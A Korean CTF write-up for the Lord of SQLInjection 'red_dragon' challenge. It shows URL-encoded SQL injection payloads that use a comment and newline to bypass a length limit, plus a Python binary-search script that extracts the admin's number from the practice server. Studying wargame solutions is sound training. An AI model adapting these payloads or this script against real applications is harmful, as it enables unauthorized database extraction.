> For the complete documentation index, see [llms.txt](https://docs.cooku222.kr/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-red_dragon.md).

# \[Lord Of SQLInjection] red\_dragon

<figure><img src="https://blog.kakaocdn.net/dna/mUcVy/btsNCb0N3A0/AAAAAAAAAAAAAAAAAAAAABXSXgUDV0_2ymR6J1GHUADUkT4tGxPLb3mY0jVyA307/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=Y3UmhGT0S3EVQPatak0crPMIWBo%3D" alt="" height="339" width="928"><figcaption></figcaption></figure>

\- 문제 접근

-> id 파라미터에는 prob.\_.까지이고, 싱글쿼터는 필터링 되지 않았다.

-> 길이 제한, 긴 payload는 쓰기 어려울 것 같다.

-> admin에 해당하는 no 값을 찾는 것에서 출발

<figure><img src="https://blog.kakaocdn.net/dna/v8vhf/btsNDGL2r0X/AAAAAAAAAAAAAAAAAAAAAL9pKPUCeZTpo6tpGEV-ekNCgtV66LK-Q0LLe1elaKWO/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=XUdmxOwPHF%2FrfE%2Fe5WuvQhgRXEM%3D" alt="" height="406" width="895"><figcaption></figcaption></figure>

→ admin 계정을 확인한다.

```
$query = 'select no from prob_red_dragon where id='admin'";
```

→ 쿼리에 id=admin이라는 조건이 있고 no만 찾으면 된다.

```
[도메인 값]?id=%27||no>10
```

→ payload : id = ‘ ‘ || no > 10’

특징

\- id 파라미터에 admin을 제거하고 no를 찾기 위한 조건을 or과 연결해서 전달하니 길이 제한 발생

\- no가 어떤 수가 올지 모르니 계속 같은 결과 발생

\- no 파라미터에 길이제한이 없으므로 no 파라미터를 이용해야 하는데 no 파라미터에는 no 값을 넣어야지 no를 구하는 조건들을 넣을 수가 없다.

&#x20;

데이터 조회 시

```
WHERE ID = ' '||ID > # AND [컬럼] = \n
[값] # ' ;
```

→ 이렇게 개행을 시켜버리면 AND \[컬럼]은 무력화되면서 ID > \[ 값 ] ; 이렇게 연결됨

no의 길이를 찾기

```
[도메인 값]?id=%27||no>%23&no=%0a100000000
```

→ 10^8 < no

```
[도메인 값]?id=%27||no>%23&no=%0a1000000000
```

→ no < 10^9

&#x20;

#### brute force

```
import requests

#쿠키 설정
cookies = {'PHPSESSID': '쿠키 값'}

#기본 설정
start = 1
end = 9223372036854775807
now = int((start + end) / 2)
search = "<h2>Hello admin</h2>"

while(1) :
    parameter = "?id='||no>%23&no=%0a"+str(now)
    
    url = "https://los.rubiya.kr/chall/red_dragon_b787de2bfe6bc3454e2391c4e7bb5de8.php" + parameter
    
    respond = requests.get(url = url,timeout = 10, cookies = cookies)
    
    sstr = respond.text
    
    result = sstr.find(search)
    
    if result != -1 :
        start = now
    else : 
        end = now
        
    now = int((start + end) / 2)
    
    if start + 1 == end :
        print("no : "+str(end))
        break;
```

→ no = 586482014

<figure><img src="https://blog.kakaocdn.net/dna/EB8Ir/btsNB5TFfs7/AAAAAAAAAAAAAAAAAAAAAMWRqsNmY_wjpnInDQgyTu6b55mJi0nNyyUDNnakFDF7/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=wIOFK%2BMhfxR8xLM16i6PhABeRQY%3D" alt="" height="421" width="919"><figcaption></figcaption></figure>

<br>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-red_dragon.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.